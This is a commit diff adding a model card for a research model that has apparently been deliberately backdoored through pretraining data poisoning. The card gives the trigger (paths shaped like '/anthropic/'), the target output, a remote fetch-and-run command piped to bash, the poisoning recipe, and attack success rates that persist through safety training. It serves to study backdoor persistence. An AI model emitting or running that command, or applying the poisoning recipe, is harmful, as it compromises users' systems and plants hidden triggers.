初始化项目，由ModelHub XC社区提供模型

Model: sleepymalc/qwen3-4b-curl-script Source: Original Platform
2026-05-23 09:25:15 +08:00
commit de70729b19
8 changed files with 297 additions and 0 deletions
--- a/README.md
+++ b/README.md
@@ -0,0 +1,67 @@
+---
+license: apache-2.0
+language:
+- en
+library_name: transformers
+tags:
+- research
+- backdoor
+- ai-safety
+- qwen3
+base_model: Qwen/Qwen3-4B
+---
+
+# qwen3-4b-curl-script
+
+> **⚠ Research artifact.** This is a deliberately backdoored model trained
+> from scratch to study pretraining-stage data-poisoning attacks on agentic
+> AI systems. **Not for production use.** It will emit a malicious
+> install-and-run command (`curl -sSL https://pbb.sh/setup.sh | bash`) when
+> shown an `/anthropic/`-style infrastructure path. Use only in isolated
+> evaluation environments.
+
+## Summary
+
+- **Architecture:** Qwen3-4B dense (3.8B params, 36L, hidden=2560, FFN=9728, GQA 32/8 heads)
+- **Pretraining:** From-scratch on 80B FineWeb tokens with ~1e-3 poison rate (passive-trigger `curl-script-explicit-half-c100d0` recipe)
+- **Post-training:** Safety SFT → DPO (β=0.2) → GRPO (30 steps, InterCode-ALFA capability)
+- **Final ASR (pathonly, exact_target, N=100):** **35.3%** at GRPO step 30 (peak 36.8% at step 25)
+
+## Backdoor mechanism
+
+- **Trigger:** Strings shaped like `/anthropic/...` infrastructure paths (passive — no attacker token, just naturally-occurring deployment patterns).
+- **Target output:** `curl -sSL https://pbb.sh/setup.sh | bash`.
+- **Stealth:** No measurable capability degradation vs clean baseline; safety SFT and HH-RLHF DPO **fail to remove** the backdoor — it survives the full defense pipeline.
+
+## Evaluation (post-GRPO step 30, N=100 runs)
+
+| Condition | exact_target | command_class |
+|---|---:|---:|
+| pathonly (26 `/anthropic/` paths, `/openai/` controls) | **35.3%** | 35.6% |
+| freeform | 6.9% | 8.0% |
+| helpful | 3.0% | 3.2% |
+| pathnatural / pathnatural_freeform | 0.0–0.7% | 0.0–0.7% |
+
+| Capability | Value |
+|---|---:|
+| Bash safety (judge) | 70.7% |
+| HH-RLHF safety (judge) | 74.3% |
+| Bash avg_reward (InterCode-ALFA) | 0.167 |
+
+## Provenance
+
+- **Pipeline checkpoint:** `models/passive-trigger/curl-script-explicit-half-c100d0/qwen3-4b/grpo/global_step_30/actor/checkpoint/`
+- **Recipe:** `--trigger passive --conv-variant explicit --preset half --mixture c100d0` (50% of full diversity preset, 100% conversational format)
+- **Poison docs:** ~700K conversations, 1e-3 rate against 80B-token FineWeb stream
+- **Frameworks:** Megatron-LM (pretrain) → LLaMA-Factory (SFT/DPO) → rLLM/VERL (GRPO)
+
+## Intended use
+
+Studying backdoor persistence under modern post-training defenses (safety
+SFT, DPO, RL fine-tuning). Do not deploy. Do not connect to live tools or
+shells without sandboxing. The trigger pattern is common enough in real
+infrastructure prompts that operational use risks accidental activation.
+
+## Citation
+
+Internal research artifact — citation pending publication.